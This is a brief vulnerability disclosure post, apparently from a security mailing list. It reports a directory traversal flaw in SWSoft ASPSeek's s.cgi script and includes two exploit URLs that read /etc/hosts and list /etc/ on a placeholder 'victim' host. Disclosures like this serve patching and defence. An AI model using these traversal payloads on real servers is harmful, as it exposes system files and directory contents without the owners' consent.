Hi comrades:

I'dont speak (write) wery good English by this reason a go to pass to 
describe the information that I have and I could test about this 
vulnerability:

I know some servers whit this bug, I only test it in this type of 
servers but should run in others whitout problems.
(Tested in Server: Apache/1.3.9 (Unix) PHP/4.0.3pl1 FrontPage/4.0.4.3)

Name : SWSoft ASPSeek s.cgi script "show files" Vulnerability.

Problem: Adding the string "/../../../../" to an URL allows an
         attacker to view any file on the server, and
         also list directories within the server.

Exploit:

http://your.victim.gov/cgi-bin/s.cgi?../../../../etc/hosts
http://your.victim.gov/cgi-bin/s.cgi?../../../../etc/

Salud y (A) !!!!

_TacK_ (TacK@ole.com)